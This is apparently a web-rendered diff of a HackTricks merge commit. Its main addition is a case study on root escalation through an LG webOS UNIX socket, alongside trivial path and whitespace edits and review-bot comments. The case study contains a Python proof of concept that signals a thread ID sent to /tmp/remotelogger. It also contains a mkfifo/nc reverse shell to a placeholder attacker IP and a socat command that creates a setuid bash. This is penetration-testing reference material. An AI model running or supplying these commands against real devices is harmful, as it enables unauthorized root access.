mirror of https://github.com/HackTricks-wiki/hacktricks.git, synced 2025-10-10 18:36:50 +00:00
	Merge pull request #1450 from HackTricks-wiki/update_LG_WebOS_TV_Path_Traversal__Authentication_Bypass__20251001_012659
LG WebOS TV Path Traversal, Authentication Bypass and Full D...
commit 9cf95010ea
				| @ -1,6 +1,6 @@ | ||||
| # Mutation Testing for Solidity with Slither (slither-mutate) | ||||
| 
 | ||||
| {{#include ../../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| Mutation testing "tests your tests" by systematically introducing small changes (mutants) into your Solidity code and re-running your test suite. If a test fails, the mutant is killed. If the tests still pass, the mutant survives, revealing a blind spot in your test suite that line/branch coverage cannot detect. | ||||
| 
 | ||||
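Review bot: The banner include-path change at the top of this Solidity mutation-testing page is unrelated to the LG webOS content named in the merge title. Move it to its own commit or mention it in the commit message, and confirm that `../../banners/` is the correct depth for this file, since the same substitution is repeated at the page footer.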
| @ -123,4 +123,4 @@ Guidance: Treat survivors that affect value transfers, accounting, or access con | ||||
| - [Arkis DeFi Prime Brokerage Security Review (Appendix C)](https://github.com/trailofbits/publications/blob/master/reviews/2024-12-arkis-defi-prime-brokerage-securityreview.pdf) | ||||
| - [Slither (GitHub)](https://github.com/crytic/slither) | ||||
| 
 | ||||
| {{#include ../../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
| @ -43,6 +43,45 @@ unix  2      [ ACC ]     STREAM     LISTENING     901181   132748/python | ||||
| echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s | ||||
| ``` | ||||
| 
 | ||||
| ## Case study: Root-owned UNIX socket signal-triggered escalation (LG webOS) | ||||
| 
 | ||||
| Some privileged daemons expose a root-owned UNIX socket that accepts untrusted input and couples privileged actions to thread-IDs and signals. If the protocol lets an unprivileged client influence which native thread is targeted, you may be able to trigger a privileged code path and escalate. | ||||
| 
 | ||||
| Observed pattern: | ||||
| - Connect to a root-owned socket (e.g., /tmp/remotelogger). | ||||
| - Create a thread and obtain its native thread id (TID). | ||||
| - Send the TID (packed) plus padding as a request; receive an acknowledgement. | ||||
| - Deliver a specific signal to that TID to trigger the privileged behaviour. | ||||
| 
 | ||||
| Minimal PoC sketch: | ||||
| 
 | ||||
| ```python | ||||
| import socket, struct, os, threading, time | ||||
| # Spawn a thread so we have a TID we can signal | ||||
| th = threading.Thread(target=time.sleep, args=(600,)); th.start() | ||||
|  tid = th.native_id  # Python >=3.8 | ||||
| s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) | ||||
| s.connect("/tmp/remotelogger") | ||||
| s.sendall(struct.pack('<L', tid) + b'A'*0x80) | ||||
| s.recv(4)  # sync | ||||
| os.kill(tid, 4)  # deliver SIGILL (example from the case) | ||||
| ``` | ||||
| 
 | ||||
| To turn this into a root shell, a simple named-pipe + nc pattern can be used: | ||||
| 
 | ||||
| ```bash | ||||
| rm -f /tmp/f; mkfifo /tmp/f | ||||
| cat /tmp/f | /bin/sh -i 2>&1 | nc <ATTACKER-IP> 23231 > /tmp/f | ||||
| ``` | ||||
| 
 | ||||
| Notes: | ||||
| - This class of bugs arises from trusting values derived from unprivileged client state (TIDs) and binding them to privileged signal handlers or logic. | ||||
| - Harden by enforcing credentials on the socket, validating message formats, and decoupling privileged operations from externally supplied thread identifiers. | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover (SSD Disclosure)](https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
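Review bot: The hardening bullet in the Notes list at the end of the new case study says "enforcing credentials on the socket" without naming a mechanism, so the mitigation is not actionable as written. Spell it out, for example by having the daemon check the connecting peer's uid with SO_PEERCRED on each accepted connection and by restricting the owner and mode of the socket path. It would also help to state that "validating message formats" here means rejecting requests whose length or TID field does not match what the daemon expects.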
| @ -744,6 +744,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._ | ||||
| 
 | ||||
| <figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure> | ||||
| 
 | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal) | ||||
|  | ||||
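Review bot: The only visible difference in this hunk is extra blank space before "## References" (the range grows from 6 to 7 lines with no new text), which is unrelated to the case study this merge adds. Drop it from the commit to keep the diff focused.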